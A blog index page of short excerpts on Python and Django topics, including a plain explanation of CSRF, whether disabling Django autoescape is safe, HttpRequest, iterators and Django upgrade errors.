-->

Software engineering facts, information, and skills categorized as Python

Cross-Site Request Forgery (CSRF) in simple words

Priya Philip 7 months ago

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Is autoescape off in django safe?

Priya Philip 10 months, 2 weeks ago

The autoescape would be a protection against cross site scripting, not sql injection. Turning autoescape off would mean you trust what is in "text", wherever it came from, not to be malicious, (ie, it should be impossible for a user to create or modify what is in text). If that assumption is valid, then you are safe against cross site scripting, otherwise, that is a security hole.

Categories:
Django Python
Stats:

HttpRequest methods

Priya Philip 11 months ago
HttpRequest represents an incoming HTTP request, including all HTTP headers and user-submitted data

HttpRequest attributes

Priya Philip 11 months ago

Django uses request and response objects to pass state through the system. When a page is requested, Django creates an HttpRequest object that contains metadata about the request. Then Django loads the appropriate view, passing the HttpRequest as the first argument to the view function. Each view is responsible for returning an HttpResponse object.

Infinite iterators in Python

Priya Philip 11 months, 2 weeks ago

An object representing a stream of data. Repeated calls to the iterator’s __next__() method (or passing it to the built-in functionnext()) return successive items in the stream. When no more data are available a StopIteration exception is raised instead. At this point, the iterator object is exhausted and any further calls to its __next__() method just raise StopIteration again. Iterators are required to have an __iter__() method that returns the iterator object itself so every iterator is also iterable and may be used in most places where other iterables are accepted. One notable exception is code which attempts multiple iteration passes. A container object (such as a list) produces a fresh new iterator each time you pass it to the iter() function or use it in a for loop. Attempting this with an iterator will just return the same exhausted iterator object used in the previous iteration pass, making it appear like an empty container.

__str__ vs __repr__ in Python

Priya Philip 11 months, 2 weeks ago

Both __repr__ and __str__ are used to represent objects in different ways.The default implementation of __repr__ for a str value can be called as an argument to eval, and the return value would be a valid string object.

Difference between null=True, blank=True in django

Priya Philip 2 years, 3 months ago

The main differnce for null and blank is 

How to deal with “SubfieldBase has been deprecated. Use Field.from_db_value...

Varghese Chacko 2 years, 3 months ago

How to deal with "SubfieldBase has been deprecated. Use Field.from_db_value instead." On upgrade to Django 1.9, we may now get the warning

Python: ImportError: cannot import name generic

Varghese Chacko 2 years, 3 months ago

After upgrading to django 1.9. Whenever I was executing the command ./manage.py runserver , I got the error :

Let us talk!

We take the vision which comes from dreams and apply the magic of science and mathematics, adding the heritage of our profession and our knowledge to create a design.